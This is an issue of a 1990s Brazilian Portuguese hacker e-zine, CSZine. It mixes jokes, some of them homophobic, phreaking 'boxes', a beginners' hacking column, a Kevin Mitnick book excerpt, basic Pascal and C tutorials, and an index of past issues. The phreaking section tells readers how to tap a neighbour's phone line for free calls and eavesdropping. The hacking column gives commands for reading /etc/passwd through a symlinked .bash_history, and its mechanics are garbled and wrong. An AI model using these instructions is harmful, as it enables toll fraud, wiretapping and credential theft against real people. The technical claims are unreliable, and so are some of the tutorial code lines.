	                                  zZZZZZZZZZZZZZZZz
	                                                zZ
	    cCCCCCCCCc         sSSSSSSSSs              zZ
	  cCCCCCCCCCCCCc     sSSSSSSSSSSSSs           zZ
	 cCCC       CCCCc   sSSS       SSSSs         zZ
	cCCCc               SSSSs                   zZ  II NNn  NN EEEEE
	CCCCC                SSSSSSSSSSs           zZ   II NNNn NN EE
	CCCCC                   SSSSSSSSSs        zZ    II NN NnNN EEEE
	CCCCC                          SSSSS     zZ     II NN  NNN EE
	 CCCC       CCCCc   sSSSS       SSSS    zZ      II NN   NN EEEEE
	  CCCCCCCCCCCCCC     SSSSSSSSSSSSSS    zZ
	    CCCCCCCCCC         SSSSSSSSSS     zZ
	                                     zZ
	                                    zZ
	                                  zZZZZZZZZZZZZZZZZz

    PS: Se você não conseguiu lêr direito, aí em cima tah escrito CSZine.

		UIN   da   revista : 16623675
		Canal  da  revista : #CSCHANNEL no irc.via-rs.com.br
		E-Mails da revista : cszine@hotmail.com
	                             cszine@xoommail.com
                Memoserv da revista: /msg memoserv send Struck <msg>
                                      (Soh no via-rs)
	        Page  da   revista : http://members.xoom.com/cszine

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Cheat=Struck-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Introdução:

	A edição passada tava joia mas está ta ainda melhor!!
	Pouca coisa mudou na zine. O tróço que eu achei mais tri foi a dos
manuais que eu to escrevendo tão saindo aos poucos na zine. Tipo.. Nessa eu
vou escrever uma materia sobre Engenharia social.
	Outra coisa tri foi a descoberta de mais duas boxes que funcionam
tanto nos EUA quanto no Brasil.
	Alguns editores irão colaborar para futuras matérias como Anarchy,
Crackerz e VIRII mas enquanto eles não mandarem os mails, talvez fique meio
que faltando coisa nessas areas.
	Um dos editores pelo menos, está levando o tróço bem a serio e já
mandou dois arquivos de materias para a area Bugz. Valeu Simon Phoenix. Porém
seu e-mail não será publicado pois é assim que ele quer.
	A seção de programação veio com 2 tutoriais dessa vez. A continuação
do de pascal e um de C. O tutorial de pascal veio com pouca coisa dessa vez
pois ele tah acabando. O de C é mais uma introdução.
	Resumindo essas 15 linhas: A zine tá ótima como sempre.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Indice:

Seção:	Materia:		Assunto:		Autor:		Nota:

1.	FuNnY			Ria um pouco		Cheat Struck	10,0
2.	Phreaking		Boxes			Cheat Struck	10,0
3.	Hacking p/ iniciantes	Entendendo os truques	Cheat Struck	9,5
4.	Kevin Mitnick		A Caçada		(Livro)		9,0
5.	Programação		Tutorial de pascal	Cheat Struck
				Tutorial de C		Cheat Struck	10,0
6.	Guia de edições		O que vimos até hoje??	Cheat Struck	10,0
7.	Vivendo			Carpe Diem		Cheat Struck	9,5
8.	Invasão de privacidade	Engenharia social	Cheat Struck	9,5
9.	Bugz			Bugz para SunOS		Simon Phoenix	10,0
10.     Hack, the Art           Tutorial para Begginers Cheat Struck    10,0

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  1. FuNnY  $$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Uma bixa vai no açougue..
Bixa - Me vê um metro de linguissa.
Açougueiro - Quer fatoado?
Bixa - Não, tá achando que meu cu é cofrinho??

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Hahahahahahahahahahahahahahahahahahahahahahaha!¡!¡!¡!¡!¡!¡

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Um português ía saltar de paraquedas.. Seu instrutor explica o que
ele terá que fazer:

- Depois que vc saltar vc puxa a primeira cordinha que o paraquedas abre. Se
ele não abrir quando vc puxar a primeira cordinha então vc puxa a segunda. Se
não abrir na segunda, o que é pouco provável de acontecer, então vc puxa a
terceira. Lah em baixo um jipe vai estar te esperando.

	O português salta.
	Puxa a primeira cordinha e nada..
	Puxa a segunda cordinha e nada...
	Puxa a terceira cordinha e nada..
	Então fala:

- Puxa! Que azar o meu! Agora só falta o jipe não ta' lah em baixo.

-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Hahahahahahahahahahahahahahahahahahahahahahaha!¡!¡!¡!¡!¡!¡

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Um kra vai numa briga de galos e pergunta para uma pessoa que estava
alí assistindo..

- Meu amigo, vc poderia me informar qual desses 2 é o galo bom??
- Sim.. O bom é o galo branco..

	Entaum o kra foi e apostou no galo branco..
	Quando começou a luta o galo preto tava dando uma surra no galo
branco.. Até ganhar por nocaute.
	Dai chega o kra pra pessoa q o informaou:

- O meu, tu não disse que o galo branco era o bom??
- Sim, o galo branco é o bom. O mau é o preto.

-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Hahahahahahahahahahahahahahahahahahahahahahaha!¡!¡!¡!¡!¡!¡

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Um português ganhou um pijama. Gostou tanto que agora só tira ele
para dormir.

-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Hahahahahahahahahahahahahahahahahahahahahahaha!¡!¡!¡!¡!¡!¡

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Duas bixa tavam dirigindo pela estrada..
	Aí um caminhão se atravessou na frente delas e bateram..
	Aí a bixa que tava dirigindo chega pro caminhoneiro:

- Seu abobado! Tu te atravessa com essa lataria na minha frente assim.. Não,
não, tu vai pagar isso.
- Calaboca sua bixa! Se não eu meto um pau no teu cú. - O caminhoneiro
- Opa! Chega mais que ele quer fechar negócio! - A bixa chamando a outra.

-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Hahahahahahahahahahahahahahahahahahahahahahaha!¡!¡!¡!¡!¡!¡

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  2. Phreaking  $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Bud Box

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Essa box utiliza a linha de uma outra pessoa para q vc não seja
tarifado.
	Puxe uma extenção da linha da casa do visinho para a sua casa.
	Desparafuse a tomada de uma extensão de sua casa, melhor que seja uma
que não esteja com nenhum aparelho conectado. Ligue os fios da extenção nos
pinos 1 e 2 da tomada(veja o desenho) e retire os que estão lah.

	 ______________________
	|                      |
	|     _                |
	|    | |     ______    |
	|    |1|    |__2___|   |
	|    |_|               |
	|     _         _      |
	|    | |       | |     |
	|    |3|       |4|     |
	|    |_|       |_|     |
	|                      |
	|______________________|

	Agora quando vc quizer ligar de graça a vontade(até pro exterior ou
0900) Conecte um aparelho naquela extenção e ligue jha!
	Mas tome cuidado! Faça isso somente quando o seu visinho não estiver
em casa, caso contrario ele poderá descobrir e colocar a policia em cima.
Tome um cuidado especial se ele tiver em casa um aparelho antigo q emite o
sinal em pulsos altos quando alguma extenção está sendo usada para discar.
	Com isso vc tb pode fazer escutas da conversa dele.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Dark Box

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Essa box redireciona qualquer chamada que seja feita a vc para o nu-
mero do seu visinho.
	Faça assim:
	Use akela extenção da bud box e conectea a sua linha. É só plugar em
uma dakelas tomadas de sua casa.
	Agora, quando alguém discar para vc além do telefone tocar aí, também
tocará no visinho. Se vc não quizer ser encomodado pelo seu telefone e quizer
deixar com que apenas toque no visinho o telefone, desplugue o fio do apareho
da tomada.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	O que que é o tal do ninex??

	Ninex é uma compania telefonica digital dos EUA. Um dos maiores alvos
dos phreakers. Agora tah explicado akela frase..

I'm a phreak..
The Phantom Phreak..
The King of the NINEX..

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$
$$$$$$$                            $$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$
$$$$$$  3. Hacking para iniciantes  $#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$
$$$$$$$                            $$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-==--=-

	Quando eu sei que sou um hacker??

	Primeiro.. Esqueça esse negócio de ser hacker. Pense apenas em estu-
dar o hacking. Assim que você souber como hackear, entender mesmo como vc fez
akilo. Aí vc pode se chamar de hacker. É claro que depois disso vc não vai
parar seu estudo por aí pensando q jah sabe tudo.
	Tipo.. Os kra que aprenderam o bug do PHF. Apenas botavam o comando
jah pronto lah e deu. Tinham o /etc/passwd e jah se achavam os hackers. Nem
faziam ideia de que aquele /bin/cat era para chamar o comando cat do unix e
que logo em seguida puxava o /etc/passwd.
	Eles só queriam saber que tinham a droga do arquivo e pronto. Ae o
bug desapareceu e eles ficaram chupando o dedo.
	A mesma coisa depois que o "quote cwd ~root" no FTP anonymous foi
descoberto. Só depois que foi descoberto por todos os administradores (esses
são outros que ao invés de arrumar eles mesmo só re-compilaram o kernel) é q
o kra lah avisou que ele existia.
	Claro! Quando vc decobre algo novo, não quer q os outros saibam para
que não arrumem o erro. Então para vc ser um hacker não basta saber todos
estas montanhas de comandos e exploits que aparecem aki na zine. Vc deve
procurar entender o funcionamento dakele outro e deduzir que isso tb funcio-
ne. Tipo a que veremos aki. É uma dica quentinha, arrecem saida do forno e se
vc não for rapido ela jah estara arrumada.
	Atenção! O baguio do quote no ftp ainda pode ser achado em BSD 4.x.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=

	Obtendo o /etc/passwd

* .bash_history
	É um arquivo de log. Então tah moleza o que se tem que fazer não??
	Bem se vc colocasse uns neuronios para pensar, voltasse na edição pa-
ssada e vêsse como usar um arquivo de log contra o próprio root, vc deduziria
a coisa mais óbvia do mundo.
	Primeiro dê akele rm esperto.

rm -f .bash_history

	Agora linke o /etc/passwd para esse arquivo.

ln -s .bash_history /etc/passwd

	Ou..

ln -s /etc/passwd .bash_history

	Não me lembro ao certo a ordem do comando ln.
	Pronto! Reebote o sistema e o procedimento será o seguinte:
1. Confira o login/senha.
2. Manda o UID e o GID para a shell(bash).
3. A shell carrega seus utilitarios, um deles é o .bash_history no diretorio
  home do usuario. Como o .bash_history é um link do /etc/passwd, o shell es-
  tará basicamente te entregando as cartas.

-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-

	Well.. Espero que com o sermão de hoje vcs tenham notado que qquer um
pode descobrir o que um hacker descobriu. É só parar para pensar um pouquinho
e a resposta estara na cara.

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  4. Kevin Mitnick  $$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	A Caçada.
	Texto extraido do livro "O pirata eletronico e o Samurai"

	A Nyx, um pequeno site ligado a Internet na Universidade de Denver,
eh um bom exemplo. A empresa eh adminstrada por Andrew Burt, palestrante e
analista de software da universidade.

	Ele nao tem dinheiro para um esquema de seguranca sofisticado - nem
tampouco tempo para adminstra-lo.O Nyx eh um sistema 'aberto',que pode ser
facilmente usado por pessoas de fora. Se utilizasse um esquema de seguranca
sofisticado, o acesso publico ficaria severamente limitado. Alem disso, Burt
acredita que a expressao 'seguranca na internet' continuara sendo um oximoro
ateh que todas as mensagens da internet sejam automaticamente codificadas.

	Os possiveis crackers na Nyx sao solicitados a ler uma nota pessoal
de Burt:

	"Para comecar, deixem-me dizer que, pessoalmente, nao sou contra os
hackers; na verdade, aprendi muito do que sei hoje sobre informatica como
resultado direto e indireto de minhas exploracoes como hacker (preterito
perfeito - consideram-me, por assim dizer, "aposentado"). Nao tenho desejo
algum de expulsar todos os hacker do Nyx; desde que voces nao ameacem o sis-
tema nem facam nenhuma besteira, tudo bem, divirtam-se. Na verdade, nao gosto
de perder meu tempo cacando gente idiota, detesto quando tenho que fazer
isto. Em outras palavras, soh vou atras de voces se voces fizerem alguma bes-
teira, forem insensatos, irritantes, egoistas, destrutivos etc."

	Em abril de 1994, quando descobriu que Kevin estava rondando no sis-
tema Nyx, Burt nao entrou em panico. Pediu a Kevin para nao danificar nada, e
ele nao danificou. Eles trocaram arquivos. Toleravam-se mutuamente. Kevin
aparentemente leu um artigo escrito por Burt onde dizia que achava que as pa-
lavras 'hacker' e 'cracker' nao eram palavras muito poeticas para descrever
intrusos em sistemas de computadores. Burt preferia o termo 'aranha'.

	Burt escreveu: "Pense nisso as aranhas entram pelos menores buracos,
de cuja existencia voce muitas vezes nem desonfia.As aranhas sempre conseguem
entrar, por mais que tentemos impedi-las. Na maioria das vezes, nao as vemos
mas elas estao la. Muitas pessoas tem, desnecessariamente, medo de aranhas.
Elas pertubam, mas a maioria nao causam dano algum. As aranhas nao gostam de
se expor. Algumas sao venenosas, mas a maioria nao eh. E dificil argumentar
com uma aranha; elas simplesmente veem as coisas sob um angulo diferente. As
aranhas frequentemente tecem intrincadas teias para continuar suas existencia
(para pegar alimentos, senhas etc.) Uma aranha pode por ovos, gerando outras
aranhas. As aranhas sao, em sua maioria, solitarias. Algumas aranhas acham
que sao livres lutadoras (Hum, hum, o Homem Aranha). A maioria tem uma pessi-
ma reputacao. A maioria das pessoas tenta pisar nelas quando as encontra pela
frente" ...

	Passados algumas semanas, Andrew Burt fez uma descoberta divertida.
Conectou-se a Nyx e descobriu um presente que Kevin Mitnick havia lhe deixado
,uns versos estranhos, aparentemente inspirados pelo texto anterior de Burt
a respeito das aranhas.O poema era todo no estilo fanfarrao on-line de Kevin.
Ele adorava bancar o superior com administradores de sistema como  Burt (no
poema, tema do Homem-aranha, um famoso desenho animado na decada de 70:

                        Homem-aranha, Homem-aranha,
                        Poderoso como um hacker
                        Crava um bug onde quer,
                        Rouba a senha que quiser.
                        Eh ele, ele eh o Homem-aranha.

                        Ele eh forte? Olha, cara,
                        Ele inunda de IRC.
                        Serah que ABurt pode ver?
                        Nao, ABurt nao alcanca.
                        Eh ele, ele eh o Homem-aranha.

                        No frio da noite,
                        Onde o crime acontece,
                        Num raio de luz,
                        Ele desaparece.

                        Homem-aranha, Homem-aranha,
                        O bom vizinho Homem-aranha.
                        Tao bem-vindo e esquecido,
                        Persegue ABurt por prazer.
                        Para ele a vida eh farra,
                        Se faz o Nyx se mexer
                        Ninguem pega o Homem-aranha

                        Homem-aranha, Homem-aranha
                        hacker de Nyx, Hacker-aranha
                        Espalha a teia onde quer
                        Rouba a senha que quiser
                        Ele eh o Homem-aranha!!

                        Homem-aranha, Homem-aranha
                        Arrasa os planos de ABurt
                        Crava bugs em telnet e ftp
                        Babaca-aburt nem vai saber
                        Eu sou o Homem-aranha!!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                $$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  5. Programação  $$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                $$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Tutorial de Pascal (parte 5)

	»»»»»»»»»»»»»»» Procedures «««««««««««««««

	Elas tem quase a mesma estrutura dos programas(Cabeçalho e corpo) com
ainda uma area de declarações. Deve ser definida na area procedures. Tipo..

Program Exemplo;
Uses CRT;

Procedure linha;		(* Declara a procedure linha *)
	Var i : integer;	(* Sub area VAR *)
	Begin			(* O corpo da procedure começa aqui *)
	    for i:=1 to 80 do write('-');
	End;

Begin
....				(* Corpo do programa *)

	»»»»»»»»»»»»»»» Functions «««««««««««««««

	São bem parecidas com as Procedures. Vejamos o exemplo:

Program Exemplo;
Uses CRT;

Function soma(a,b:real):real;		(* Declara a function soma *)
	Begin				(* O Corpo da function começa aqui *)
	    soma:=a+b;
	End;

Begin
....				(* Corpo do programa *)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Tutorial de C

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	_.-`^`\_.-`^`\_.-`^`\ Compiladores para UNIX _.-`^`\_.-`^`\_.-`^`\

* CC
  use: cc -o programa fonte.c

* GCC
  use: gcc -o programa fonte.c

	_.-`^`\_.-`^`\_.-`^`\ Compiladores para DOS _.-`^`\_.-`^`\_.-`^`\

* BCC
  use: bcc programa

* GCC
  use: fonte.c -s programa

	_.-`^`\_.-`^`\_.-`^`\ Definindo variaveis _.-`^`\_.-`^`\_.-`^`\

* int
  Numeros decimais inteiros
  Ex:	int variavel;
	int Numero=2.555;

* float
  Numeros decimais racionais
  Ex:	float variavel;
	float Numero=25;

* char
  Qualquer caracter
  Ex:	char variavel;
	char letra='Z';

* double
  Numeros decimais racionais longos
  Ex:	double variavel;
	double numero=2525252525;

	_.-`^`\_.-`^`\_.-`^`\ Funções _.-`^`\_.-`^`\_.-`^`\

	As principais funções(descrita nesse tutorial irão se encontrar no
conjunto de comandos stdio.h . Para chama-lo, acresente nas primeiras linhas
da fonte(antes do main):

#include <stdio.h>

* printf
  Mostra um texto na tela.
  Ex:	printf("texto\n");
	int numero=5;
	printf("Numero: %d\n", numero);
	                | |
	                | +--codigos especiais
			+--codigos printf

* scanf
  Coloca retorno do teclado em uma variavel.
  Ex:	scanf("%d",&numero);
	       |    |
	       |    +--variavel(sem o &)
	       +--codigos printf

       _.-`^`\_.-`^`\_.-`^`\ Lista de codigos especiais _.-`^`\_.-`^`\_.-`^`\

\n	-	Nova Linha
\r	-	Retorno do Cursor
\t	-	Tab
\b	-	Retrocesso
\"	-	Aspas
\\	-	Barra
\f	-	Saltar Pagina De Formulario
\0	-	Nulo

	_.-`^`\_.-`^`\_.-`^`\ Lista de codigos printf _.-`^`\_.-`^`\_.-`^`\

%c	-	Qualquer caracter
%d	-	Numeros decimais inteiros
%e	-	Notacao Cientifica
%f	-	Numeros Decimais racionais
%o	-	Octal
%s	-	Cadeia de Caracteres
%u	-	Decimal sem sinal
%x	-	Hexadecimal
%ld	-	Decimal loongo
%lf	-	Numeros decimais racionais Longos

	_.-`^`\_.-`^`\_.-`^`\ Trabalhando com numeros _.-`^`\_.-`^`\_.-`^`\

* Soma
  ex:	resultado=1+1;			/* Resultado = 2 */

* subtracao
  ex:	resultado=3-1;			/* Resultado = 2 */

* multiplicação
  ex:	resultado=2*2;			/* Resultado = 4 */

* divisão
  ex:	resultado=4/2;			/* Resultado = 2 */
	resto=4%2;			/* Resto = 0 */

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                    $$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  6. Guia de edições  $$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                    $$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Guia de edições da CSZine

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Edição 00 (betatest)

Seção:	Materia:		Assunto:		Autor:		Nota:
1. 	Introdução		CSZine			Cheat Struck	---
2. 	Kevin Mitnick		Opinião			Cheat Struck	8,0
3. 	Identifique-us		Quem é quem??		Cheat Struck	8,5
4. 	Objetivo		Motivo da CSZine	Cheat Struck	---
5. 	Programação		Comandos para .BAT's	Cheat Struck	8,5
6. 	Invasão de privacidade  Introdução a invasão	Cheat Struck	7,0
7. 	VIRII			Introdução a VIRII	Cheat Struck	7,0
8. 	Phreaking		Introdução a Phreak	Cheat Struck	7,0
9. 	Hack, the Art		Introdução a Hack	Cheat Struck	7,0
10. 	Preview			O que vem depois??	Cheat Struck	---

Total:									7,5

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Edição 01

Seção:	Materia:		Assunto:		Autor:		Nota:
1. 	Introdução		CSZine 01		Cheat Struck	---
2. 	Kevin Mitnick		Um pouco de historia	Cheat Struck	7,5
3. 	Manifesto		Hacker Manifesto	The Mentor	9,5
4. 	Bugs			Bugz no MS-DOS		Cheat Struck	6,5
5. 	Programação		Comandos de VB		Cheat Struck	8,5
6. 	Invasão de privacidade	Invasão por FTP		Cheat Struck	9,0
7. 	VIRII			Tipos de virus		Cheat Struck	8,5
8. 	Phreaking		Basicos sobre telefonia	Ton Waits	9,5
9. 	Hack, the Art		Hackeando a Ginet	Cheat Struck	10,0
10. 	Preview			O que vem depois??	Cheat Struck	---

Total:									8,6

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Edição 02

Seção:	Materia:		Assunto:		Autor:		Nota:
1. 	Introdução		CSZine 02		Cheat Struck	---
2. 	Poemas			Poemas de kras famosos	Cheat Struck	7,0
3. 	Programas hackers	Hacker's UtIlItY	Cheat Struck	9,0
4. 	Bugs			Bug no IIS de WinNT	Cheat Struck	8,5
5. 	Invasão de privacidade	Invasão por monitoração	Cheat Struck	9,0
6. 	FAQ sobre sniffer	Perguntas e Respostas	Cheat Struck	9,0
7. 	Dicas Hackings		Saiba mais sobre o Nuke	Cheat Struck	7,5
8. 	Phreaking		Ligações de graça	Ton Waits	9,5
9. 	Hack, the Art		Mais ftp de provedores	Cheat Struck	8,5
10. 	Preview			O que vem depois??	Cheat Struck	---

Total:									8,5

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Edição 03

Seção:	Materia:		Assunto:		Autor:		Nota:
1. 	Introdução		CSZine 03		Cheat Struck	---
2. 	Poemas			Poemas de kras famosos	Cheat Struck	7,5
3. 	Programas hackers	Nuke 2.3		Cheat Struck	8,5
4. 	Boxes			Lista de boxes		Cheat Struck	8,5
5. 	Phreaking		Truques pro Celular	Cheat Struck	9,5
6. 	VIRII			Virus em .BAT's		Cheat Struck	8,0
7. 	Dicas Hacks		Ftp via mIRC		Cheat Struck	9,0
8. 	Pesquisa		Lista de pesquisa hack	Cheat Struck	9,5
9. 	Hack, the Art		Treinando o UNIX	Cheat Struck	8,5
10. 	Preview			O que vem depois??	Cheat Struck	---

Total:									8,6

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Edição 04

Seção:	Materia:		Assunto:		Autor:		Nota:
1. 	Introdução		CSZine 04		Cheat Struck	---
2. 	VIRII			Tutorial de Assembler	Cheat Struck	9,5
3. 	Phreaking		Testando os truques	Cheat Struck	9,0
4. 	Programas Hackers	Emulador de UNIX	Cheat Struck	8,5
5. 	Pesquisa		Lista de pesquisa hack	Cheat Struck	9,5
6. 	Servisos FREE		Acesso gratuito		Cheat Struck	9,5
7. 	Dicas Hacks		Tn3270			Cheat Struck	7,5
8. 	Invasão de privacidade	PPE Backdoor		Cheat Struck	9,0
9. 	Hack, the Art		Pegando o passwd	Cheat Struck	8,5
10. 	Preview			O que vem depois??	Cheat Struck	---

Total:									8,8

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=

	Edição 05

Seção:	Materia:		Assunto:		Autor:		Nota:
1. 	Introdução		CSZine 05		Cheat Struck	---
2. 	Dicas Hacks		Contas default		saqueadores	9,0
3. 	Bugs			Sendmail 5.57		Cheat Struck	10,0
4. 	VIRII			Tutorial de Assembler	Cheat Struck	9,5
5. 	Programas Hackers	KeyCopy 1.01		Cheat Struck	8,0
6. 	Hacking p/ iniciantes	Onde hackear??		Cheat Struck	8,5
7. 	Phreaking		Programando Celulares	Cheat Struck	9,5
8. 	Invasão de privacidade	Invadindo Windows	Cheat Struck	9,0
9. 	Hack, the Art		Universidades		Cheat Struck	7,5
10. 	Preview			O que vem depois	Cheat Struck	---

Total:									8,8

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Edição 06

Seção:	Materia:		Assunto:		Autor:		Nota:
1. 	Introdução		CSZine 06		Cheat Struck	---
2. 	Dicas Hacks		Reconhecendo o shadow	Cheat Struck	8,5
3. 	Kevin Mitnick		A historia de Mitnick	Marcus Hübner	9,5
4. 	Pesquisa		Lista de pesquisa hack	Cheat Struck	9,5
5. 	VIRII			Tutorial de Assembler	Cheat Struck	9,0
6. 	Phreaking		Programando celulares	Cheat Struck	8,5
7. 	Bugs			Bugz para AIX		rEPTILE0	9,0
8. 	Programas hackers	Dictionary Builder	Cheat Struck	8,5
9. 	Hack, the Art		FTP Client/Server	Cheat Struck	10,0
10. 	Preview			O que vem depois??	Cheat Struck	---

Total:									9,0

